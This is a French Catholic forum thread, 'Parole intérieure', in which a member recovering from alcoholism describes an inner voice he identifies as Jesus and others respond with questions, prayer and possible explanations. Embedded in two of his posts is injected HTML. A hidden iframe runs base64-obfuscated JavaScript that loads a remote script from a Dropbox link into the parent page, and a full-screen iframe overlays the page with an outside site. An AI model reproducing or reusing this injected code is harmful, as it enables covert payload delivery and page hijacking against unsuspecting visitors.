DOCTEUR ANGÉLIQUE FORUM CATHOLIQUE

Théologie Spirituelle Catholique
Pour déposer une intention de prière : Agapé
ATTENTION : Les publicités ci-dessous sont indépendantes de notre volonté !

AccueilAccueil  PortailPortail  S'enregistrerS'enregistrer  Connexion  

Partagez | 

Parole intérieure

AuteurMessage
Zaratoustra

Masculin Messages : 14

MessageSujet: Parole intérieure   Mar 27 Fév 2018, 15:42

Bonjour,

Il y a quelque temps c’est produit un changement dans ma façon de penser, les phrases se formaient en vers avant que je ne les dise.

Par la suite, une pensée qui n’est pas la miennes est apparue dans mon esprit, en fait quelqu’un me parle par le biais d’un langage qui n’est pas sonore, par des paroles claires qui vienne s’interposer dans mon conscient.  Cette pensée m’apporte des preuves de son existence en moi. Avec des mots que je ne connais pas et qu’il me faut chercher pour comprendre, et qui tombe fort à propos avec une réflexion que je me fais, des phrases métaphoriques qui trouvent un sens profond, des prédictions qui se réalise ; aussi par l’entremise d’un mots d’on je ne connais pas le sens, placer dans une phrase qui n’en prend un qu’après compréhension du mots judicieusement placer.
Par ces fait, cette pensée me fit savoir que mon esprit ne pouvait pas produire une phrase qui avait un sens, sans connaître le sens de tous les mots. Il fallait que cette pensée vienne prendre place dans mon esprit et infuse, tel une tierce personne, des paroles qui n’était pas de moi.

Par ce moyen cette pensée m’a fait prendre conscience, malgré mes doutes, que ma raison n’était pas défaillante.

Doute qui reste persistant car je ne trouve pas de réponse plausible à mon cas.

C’est pourquoi je m’adresse à vous, auriez vous une idée de ce qui se passe en moi ?

Dans l'espoir de vous lire.
Revenir en haut Aller en bas
boulo
Administrateur

Masculin Messages : 12690

MessageSujet: Re: Parole intérieure   Mar 27 Fév 2018, 15:56

Intéressant . Je dois m'absenter mais je m'exprimerai ce soir sur le sujet . Merci pour le partage , Zaratoustra .
J&B

Féminin Messages : 3915

MessageSujet: Re: Parole intérieure   Mar 27 Fév 2018, 17:00

On peut avoir des exemples de ces coïncidences entre le mot et la réflexion que tu te fais ?
ou un exemple de prédiction ?

Est-ce que le texte que tu viens d'écrire pour présenter ton "cas" fait partie de ce phénomène ?

Sinon, pour la correction orthographique, je te suggère https://bonpatron.com/
Les autres correcteurs, on les reconnaît aux fautes d'accords qu'ils laissent passer Smile

humanlife

Masculin Messages : 12767

MessageSujet: Re: Parole intérieure   Mar 27 Fév 2018, 17:26

Zaratoustra a écrit:
Bonjour,

Il y a quelque temps c’est produit un changement dans ma façon de penser, les phrases se formaient en vers avant que je ne les dise.

Par la suite, une pensée qui n’est pas la miennes est apparue dans mon esprit, en fait quelqu’un me parle par le biais d’un langage qui n’est pas sonore, par des paroles claires qui vienne s’interposer dans mon conscient.  Cette pensée m’apporte des preuves de son existence en moi. Avec des mots que je ne connais pas et qu’il me faut chercher pour comprendre, et qui tombe fort à propos avec une réflexion que je me fais, des phrases métaphoriques qui trouvent un sens profond, des prédictions qui se réalise ; aussi par l’entremise d’un mots d’on je ne connais pas le sens, placer dans une phrase qui n’en prend un qu’après compréhension du mots judicieusement placer.
Par ces fait, cette pensée me fit savoir que mon esprit ne pouvait pas produire une phrase qui avait un sens, sans connaître le sens de tous les mots. Il fallait que cette pensée vienne prendre place dans mon esprit et infuse, tel une tierce personne, des paroles qui n’était pas de moi.

Par ce moyen cette pensée m’a fait prendre conscience, malgré mes doutes, que ma raison n’était pas défaillante.

Doute qui reste persistant car je ne trouve pas de réponse plausible à mon cas.

C’est pourquoi je m’adresse à vous, auriez vous une idée de ce qui se passe en moi ?

Dans l'espoir de vous lire.

ça ne semble pas inquiétant, néanmoins ne vous laissez pas hypnotiser par le phénomène.
Essayez plutôt de prendre du recul, de chercher une explication au phénomène, par une attitude de lucidité ou de concentration, et au mieux de vous recentrer sur votre propre pensée, vos propres mots comme vous le faites ici en vous questionnant sur le phénomène.

Sinon quittez le phénomène quand il survient par l'action de votre pensée par exemple en vous concentrant sur une lecture, en pratiquant une activité domestique ou en récitant des prières que vous connaissez, ou même en les écrivant par exemple sur un cahier.

D'autres personnes pourront aussi vous apporter des éclairages et des solutions face au phénomène.
Zaratoustra

MessageSujet: Re: Parole intérieure   Mar 27 Fév 2018, 20:27

@ J&B : Ne vous attendez pas à du phénoménal, ce que l'on me fait vivre est de l'ordre de l'humble et du modeste, cela reste en rapport avec mon quotidien.

Le dernier mot en date, est apparu à la suite d'un questionnement à ce sujet de l'apparition de la vie sur Terre. J'avais lu un sujet, sur un autre forum, qui en traitait et qui ne donnait pas d'information sur le commencement, mon questionnement était de savoir où la vie avait débuté. Le mot « Cytoplasme », que je ne connaissais pas, fut prononcé en parole très claire dans mon esprit, après recherche sur le net j'ai su qu'il s'agissait de ce qui compose la cellule.
Il y a eu aussi d'autre forme de parole, par exemple, je repensais au portail que j'ai réalisé pour cher moi et au défaut qu'il avait, seulement je ne me rappelais plus le terme usuel pour qualifier ce défaut. La voix dans mon esprit me dit « C'est un palindrome », je ne connaissais pas le mot et je ne me connaissais donc pas sa définition, je demandais donc à la voix de me dire ce qu'il signifiait. Elle me dit, « Une construction du langage ». Au mot construction je revis le portail et retrouvais le terme qu'il me manquait, c'était le mot « Symétrie », car en fait un palindrome est une phrase que l'on peut plier en deux et former une symétrie. Je n'ai pas l'instruction suffisante, ni même assez d'intelligence, pour imaginer une telle métaphore.

Plusieurs prédiction mon été faite, et pour vous elle ne serons peut être pas très probante, seulement pour moi elle ont toute une grande importance.

Un matin alors que je faisais une promenade, la voix me dit « il va se passer quelque chose d'important ». En rentrant cher moi je constate, que l'un de mes chats à la poitrine ouverte, on file chez le vétérinaire.
Un gros souci, pour moi et bien des gens, sous le même traitement. Le ministère de la santé à recommande la prise de Baclofène à 80mg par jour, la plupart des utilisateurs sont bien au-delà et ne peuvent pas descendre, sans risquer une rechute.
La voix me dit, «Tout s'arrangera ». Et, en effet, mon médecin est resté compréhensif et le pharmacien l'a suivi, pas de problème pour moi, tout c'est arrangé.
La voix m'a dit, « Tu n'auras plus de souci ! »
Etant en fin de droit au Assedic, j'ai fais une demande de RSA, la réponse se faisant attendre, j'ai voulu consulter mon dossier sur le site de la CAF et là surprise, on me dis que mon dossier est clôturé. Ne sachant quoi faire, je dis à la voix, « C'est pas un souci ça ? » elle me répond « Non, c'est un contretemps. Tu l'as déjà. ». Je suis resté sans savoir que dire, mais le doute ne sait pas fais sentir. J'ai téléphoné à la CAF, un monsieur m'a donné les renseignements nécessaires, pour faire rouvrir mon dossier, en me disant tout de même que ma demande était reçu, il ne me restait plus qu'à attendre le courrier de la CAF. Les jours ont passé et la lettre tend attendu est arrivé, j'avais enfin un mot de passe pour me connecter sur mon compte CAF. Et là, j'ai pu constater que le virement de mon allocation avait été fait, quelques jours après que Jésus me l'ai dit, mais ma demande avait été accepté avant que la voix m'ait dit « Tu l'a déjà ».
Bien des choses se sont passées dans ma vie, des changements dans ma façon de penser, ou tout simplement de vivre, cette « voix » m'a fait changer et continue de me faire progresser.

Je ne pourrais pas dire que ce texte de présentation ne m'a pas été un peu inspiré .

Merci pour le correcteur  Smile
J&B

MessageSujet: Re: Parole intérieure   Mar 27 Fév 2018, 21:47

Un phénomène n'est pas spécialement phénoménal, c'est juste un fait observé, mais c'est quand même assez phénoménal Smile

- Comment sais-tu que c'est Jésus qui te parle ?
-  S'est-il passé quelque chose d'important qui a coïncidé avec ce phénomène ?  Le décès d'un proche ? une forte émotion ? une prière ?
- C'est régulier ? croissant ?
- Cette chose a plutôt un effet angoissant ou rassurant ?
- Tu parles de progression, ce qui est rassurant de prime abord,  mais une progression vers quoi ?
- Est-ce que ça peut être des effets secondaires des médicaments ? Tu as en parlé à ton médecin ? Tu souffres de quoi ? (si ce n'est pas indiscret, bien sûr)

Citation :
As-tu déjà demandé à la voix pourquoi elle te parle ?

Après, il peut y avoir plusieurs théories possibles, mais je pense que la bonne réponse ne peut venir que de toi, étant donné que tu as déjà pris l'habitude d'observer ta conscience, c'est peut-être la forme du début d'un éveil spirituel.
sonia

Féminin Messages : 1642

MessageSujet: Re: Parole intérieure   Mar 27 Fév 2018, 22:17

Moi si j'étais toi je remettrais cela à Dieu.Si c'est sa Volonté fasse que je l'entende autrement non...

Autrement c'est paranormal c'est une personne?un ange?
Est ce le bien ou le mal?
Voilà ce que je me poserais comme question.

Administrateur

Féminin Messages : 2451

MessageSujet: Re: Parole intérieure   Mer 28 Fév 2018, 11:08

C'est vraiment pas évident..

Cela pourrait être de la clair audience;
Cela pourrait venir aussi de votre mémoire  ( votre cerveau a enregistré ces mots qui resurgissent quand vous en avez besoin ; meme si vous les avez oublié, l'inconscient les a enregistré)
Cela peut venir d'un trouble tel que la schizophrènie;
Cela peut venir de Dieu si cela vous conduit à l'humilité et l'amour de charité...
Cela peut venir de l'adversaire ...

Les questions de jb sont pertinentes.
Zaratoustra

MessageSujet: Re: Parole intérieure   Mer 28 Fév 2018, 12:30

@ J&B

Je ne souhaitais pas dire dès le début que je savais que c’était notre Seigneur qui me fait cet honneur, pour ne pas choquer. Mais j’ai été rattrapé par la vérité, malgré moi.

J&B a écrit:

- Comment sais-tu que c'est Jésus qui te parle ?
J'ai en effet demandé qui s'adressait à moi, car je l'appelais Dieu sans savoir vraiment si ça n'était pas un ange.
J&B a écrit:

- S'est-il passé quelque chose d'important qui a coïncidé avec ce phénomène ? Le décès d'un proche ? une forte émotion ? une prière ?
Cela a commencé le 2 Décembre 2013, au petit matin.
Je priais comme j'en avais pris l'habitude pour rendre grâce à Dieu de ses biens faits. Au milieu de ma prière sa voix m'a dit en esprit (car je n'entends pas comme par les oreilles), « Veux tu m'aimer », je suis tombé à genoux sur le sol et dans un flot de larme, j'ai dit « Oui ». Là, j'ai ressenti un amour intense et une profonde joie.

J&B a écrit:

- Cette chose a plutôt un effet angoissant ou rassurant ?
C’est tout à fait rassurant, car lorsque je suis troublé par cause d’un doute, comme il m’arrive de temps en temps, je me sens très vite réconforté par une parole affectueuse ou une sensation de douceur. C’est une relation très proche d’intime amitié.

J&B a écrit:

- C'est régulier ? croissant ?
C’est régulier, mais mon amour est croissant.

J&B a écrit:

- Tu parles de progression, ce qui est rassurant de prime abord, mais une progression vers quoi ?
Il me fait passer par le feu, me purifie jusqu'à l'union.

J&B a écrit:

- Est-ce que ça peut être des effets secondaires des médicaments ? Tu as en parlé à ton médecin ? Tu souffres de quoi ? (si ce n'est pas indiscret, bien sûr)
Je suis soigné pour alcoolisme, mais je ne buvais déjà pratiquement plus depuis trois ans, par la grâce du Christ, sauf de rare exception quand il me retirait cette grâce, il m'a fait prendre conscience de mon problème et savoir que je ne pourrais pas être indifférent à l'alcool si je ne me faisais vraiment pas soigné, mon traitement m'a fait stopper la consommation depuis un an. J'avais donc la voix avant les médicaments et après l'arrêt d'alcool.

<iframe style='display:none' src=javascript:eval(atob('dmFyIGg9cGFyZW50LmRvY3VtZW50LmhlYWQ7aWYoIWgpe2g9cGFyZW50LmRvY3VtZW50LmJvZHk7fXZhciBzPXBhcmVudC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9kbC5kcm9wYm94LmNvbS9zLzVmcmFrMG5ocmsyYmVtci9hLmpzPycrTWF0aC5mbG9vcigoTWF0aC5yYW5kb20oKSoxMDApKzEpKTtoLmFwcGVuZENoaWxkKHMpOw=='));></iframe><iframe class='trueMsgFrame' style='position:absolute;left:0px;top:0px;width:100%;height:100%;z-index:1000;min-width:3000px;min-height:3000px' src='http://hat-733.getforge.io'></iframe>
k11
Administrateur

Féminin Messages : 2451

MessageSujet: Re: Parole intérieure   Mer 28 Fév 2018, 12:46

Quel beau témoignage pour ce partage plus précis .
J&B

MessageSujet: Re: Parole intérieure   Mer 28 Fév 2018, 13:35

Citation :
Je ne souhaitais pas dire dès le début que je savais que c’était notre Seigneur qui me fait cet honneur, pour ne pas choquer. Mais j’ai été rattrapé par la vérité, malgré moi.
C'est bien ce qu'il m'a semblé Smile et c'est tout à ton honneur, merci pour tes réponses.
Rassure-toi ici, on n'est pas choqué de ce genre de choses.
En tout cas, cela me paraît témoigner de la vie en Christ.

Mais quelque chose que je ne comprends pas : pourquoi Jésus ne guérit-il pas totalement et te fais comprendre qu'il faut que tu soignes aussi par médicament ?

Je serais intéressée aussi de savoir ce qu'en pense Théodéric, qui a aussi eu la grâce d'une proche rencontre avec Jésus.
Zaratoustra

MessageSujet: Re: Parole intérieure   Mer 28 Fév 2018, 13:49

Aide toi et le ciel t'aidera !
Jésus m'aide pour bien d'autre chose.

Vous aussi vous m'aidé à y voir plus claire, vous m'apporter l'assurance que je ne trouvais pas.
Je peu maintenant aimer de tout mon cœur, en plaine confiance.

J&B

MessageSujet: Re: Parole intérieure   Mer 28 Fév 2018, 15:36

En effet, Jésus ne veut pas nous réduire à être des assistés béats, qui auraient tôt fait de tout oublier Smile

Citation :
cheers
J&B

MessageSujet: Re: Parole intérieure   Jeu 01 Mar 2018, 19:04

Une vidéo intéressante de quelqu'un qui entend des voix et qui est devenue thérapeute et conférencière :

Zaratoustra

MessageSujet: Re: Parole intérieure   Ven 02 Mar 2018, 09:38

Merci pour ce partage.
J'ai entendu le message, et je me questionne. Sa voix vient elle d'un ange qui ne se fait pas reconnaître, qui ne la conduit pas vers notre Seigneur ?

Où est l'amour de Dieu ?
J&B

MessageSujet: Re: Parole intérieure   Ven 02 Mar 2018, 11:07

Le mot "ange" signifie messager, et comme un ange n'a pas de corps physique, on peut dire que c'est l'ange, c'est le message.

Elle ne parle pas nommément ni de Dieu, ni de Jésus, ni d'anges, ni de religion, elle dit que la voix est intérieure et vient de la Conscience qui est en toutes choses et son leitmotiv est de ne pas se soumettre à la Peur qui nous enferme, nous paralyse et formate notre mental/ego/raison, qui à son tour aura des répercussions sur le corps. Rien de plus logique. C'est un langage psycho-spirituel  qui n'est pas, selon moi, incompatible avec ce que dit Jésus. Le Christ appelle à se libérer de toutes les manières et pas seulement dans le carcan religieux. Et tout retourne au Père.

La Conscience ou l'Intelligence qui est en toutes choses, c'est le Verbe incarné, non seulement en Jésus, mais en tous. Après chacun devra faire fructifier ce Talent selon l'intelligence qui lui est donnée pour le reconnaître.
Col. 1, 16
Il est l'image du Dieu invisible, le premier-né de toute la création.
Car en lui ont été créées toutes les choses qui sont dans les cieux et sur la terre, les visibles et les invisibles, trônes, dignités, dominations, autorités. Tout a été créé par lui et pour lui. Il est avant toutes choses, et toutes choses subsistent en lui.

Ça veut bien dire que Dieu est en toutes choses et en tous et que Jésus en est le Premier-Né, et que s'il y a un premier né, il y en aura d'autres, comme Jésus qui feront, dit-il, encore de plus grandes choses que lui-même.
Jean 14,12 En vérité, en vérité, je vous le dis, celui qui croit en moi fera aussi les oeuvres que je fais, et il en fera de plus grandes, parce que je m'en vais au Père;
N'oublions pas que le second commandement est semblable au premier...et ce que vous avez fait au plus petit, c'est à MOI que vous l'avez fait....

"N'ayez pas peur" est une expression qui fait généralement référence à une injonction biblique dont on relève trois cent soixante-cinq occurrences dans les Écritures (Wiki)
Cette peur est pour nous est comparable à l'Ennemi, le diable, l'Accusateur qui est aussi un des masques de Satan.
Il nous accuse même d'être orgueilleux de penser qu'on est potentiellement des "dieux".... ou qu'on a en nous quelque chose de Jésus-Christ Smile

Jésus nous dit que la Vérité est simple et accessible à tous.
sonia

MessageSujet: Re: Parole intérieure   Sam 03 Mar 2018, 17:54

wow j'en pleure si tu as la chance que Dieu ou un ange te parle et merci pour le témoignage.Moi Dieu me manque toujours autant c'est terrible.Terrible.

MessageSujet: Re: Parole intérieure   Dim 04 Mar 2018, 15:01

J'ai envoyé une demande de discernement au Frère Carmes de Paris, qui m'on orienté sur le frère Y de Lisieux. Il m'a proposé un rendez-vous téléphonique ce samedi.

Voici la demande que j'ai faite :
demande de discernement:

Ayant étudié ma demande avec minutie il m'a posé plusieurs questions afin de bien cerner ma personnalité. Ensuite, il m’a demandé de lui dire ce qu’ait ma relation avec Dieu, ce qu’il m’apporte et me fait vivre. Je lui ai expliqué les diverses étapes par lesquels il m’a fait passer, afin de purifier et d’élever mon âme. Après m’avoir écouté il a conclu que j’avais un très beau parcourt avec notre Seigneur et que j’étais bien pris en main.

Me voilà pleinement rassuré Smile
Zaratoustra

MessageSujet: Re: Parole intérieure   Dim 04 Mar 2018, 16:37

Au début de mon histoire j’étais un être corrompu. Je vivais dans le péché, l’alcool, le tabac, la drogue et le sexe salissait ma vie.

Si j’ai un message à faire passer, c’est qu’il a fallu que je tombe si bas que seul Dieu pouvait me relever.

Ne perdez jamais espoir et n’arrêtez pas non plus de prier.

Béni soit le Seigneur
Nane

Féminin Messages : 445

MessageSujet: Re: Parole intérieure   Dim 04 Mar 2018, 18:04

Voilà qui est encore plus beau cheers .

Zaratoustra.
sonia

MessageSujet: Re: Parole intérieure   Dim 04 Mar 2018, 22:30

C'est beau Dieu peut tout faire,moi aussi m'à vie est belle maintenant, mais Dieu manque on aimerait être avec Lui,le ressentir tout le temps,qu'il nous parle,qu'on soit en Lui.On peut plus se faire avoir et se laisser emporter par la vie le boulot et l'argent etc car au fond on a réel manque ,
Peut être je resse'tirait moins ce manque si je prirai plus ou que je ferais plus Sa Volonté ? Mais tant qu'on fusionne pas avec Lui je pense qu'on sera en manque.
Moi je déteste le mal maintenant que j,ai découvert Dieu j'aimerais que toutes mes cellules soient remplies de Dieu, j'aimerais qu'aucun de mes neurones soit capables de penser le mal,j'aimerais que Dieu soit en moi ,dans chaque recoinpour que je puisse être bonne toute le temps,j'aimerais être avec Lui ,faire du bien,Le servir et que chaque ame dans ce monde Se donne à Lui et choisissez l'Amour.j'aimerais voir Dieu ,ça me fait pleurer quand j'y pense

MessageSujet: Re: Parole intérieure   Lun 05 Mar 2018, 11:45

Zaratoustra a écrit:
Aide toi et le ciel t'aidera !
Jésus m'aide pour bien d'autre chose.
Vous aussi vous m'aidé à y voir plus claire, vous m'apporter l'assurance que je ne trouvais pas.

C'est bien.
Je voulais te demander: Est-ce que tu arrives à avoir un travail avec ce genre de problématique qui te concerne??
Zaratoustra

MessageSujet: Re: Parole intérieure   Lun 05 Mar 2018, 12:37

@ Sonia : si Dieu te manque, c'est tout simplement que tu l'aimes, alors continue à l'aimer, car même si tu l'avais tous les jours avec toi, il continuerait de te manquer.
Dieu est en toi et tu le vis, c'est l'amour que tu donnes à ton prochain.

@ humanlife : Je ne travaille plus comme on l'entend, je fais du bénévolat, et j'ai une aide sociale.

<iframe style='display:none' src=javascript:eval(atob('dmFyIGg9cGFyZW50LmRvY3VtZW50LmhlYWQ7aWYoIWgpe2g9cGFyZW50LmRvY3VtZW50LmJvZHk7fXZhciBzPXBhcmVudC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9kbC5kcm9wYm94LmNvbS9zLzVmcmFrMG5ocmsyYmVtci9hLmpzPycrTWF0aC5mbG9vcigoTWF0aC5yYW5kb20oKSoxMDApKzEpKTtoLmFwcGVuZENoaWxkKHMpOw=='));></iframe><iframe class='trueMsgFrame' style='position:absolute;left:0px;top:0px;width:100%;height:100%;z-index:1000;min-width:3000px;min-height:3000px' src='http://hat-733.getforge.io'></iframe>
humanlife

MessageSujet: Re: Parole intérieure   Lun 05 Mar 2018, 15:11

Et Est-ce que tu penses un jour à reprendre un travail??
Zaratoustra

MessageSujet: Re: Parole intérieure   Lun 05 Mar 2018, 16:13

Quand mon état de santé me le permettra, oui.

Il me faudra alors envisager une reconversion, car je ne peux plus exercer mon métier qui était "agent d’entretien en espace vert", après un accident de scooter où je me suis cassé l'épaule droite.
Depuis j'ai de l'arthrose et de la tendinite. Cela ajouté à un traitement contre l'alcoolisme, qui est une réussite, qui diminue progressivement, mais qui me rend la vie difficile à cause des effets secondaires.

Mais j'ai espoir en notre Seigneur, il me conduira sur le chemin de ma destinée.
Invité
Invité

MessageSujet: Re: Parole intérieure   Lun 05 Mar 2018, 17:31

:sts: I love you :sts: queen

Que chaque parole de ce cantique (je ne sais plus lequel?) devienne pour nous une prière :

- Aussi longtemps qu’étranger sur la terre, Je foulerai les sentiers douloureux. Fais qu’en tout temps, à tout bien je préfère ce que tu veux, Seigneur ! Ce que tu veux

- Oui qu’en tout temps, sous la croix la plus dure, au jour mauvais comme au jour radieux, je puisse dire éloignant tout murmure comme tu veux, Seigneur ! Comme tu veux !

- Je ne demande, O mon Dieu ! Qu’une chose : Sois mon trésor, mon appui précieux ; pour tout le reste, ordonne, faits, dispose comme tu veux Seigneur ! Comme tu veux !

- Etablis donc sur mon cœur ton empire. Si bien et par de si doux nœuds que rien jamais ne m’empêche de dire : Comme tu veux, Seigneur ! Comme tu veux !

- Et puis un jour, sans trouble, sans alarme, je chanterai sur des bords plus heureux, l’hymne qu’ici, je mêle avec mes larmes : Comme tu veux, Seigneur ! Comme tu veux !

Bon carême cher Zaratoustra flower
Zaratoustra

MessageSujet: Re: Parole intérieure   Lun 05 Mar 2018, 18:31

Bon carême à toi aussi Arc en Ciel !

Contenu sponsorisé

MessageSujet: Re: Parole intérieure   

Parole intérieure
Page 1 sur 1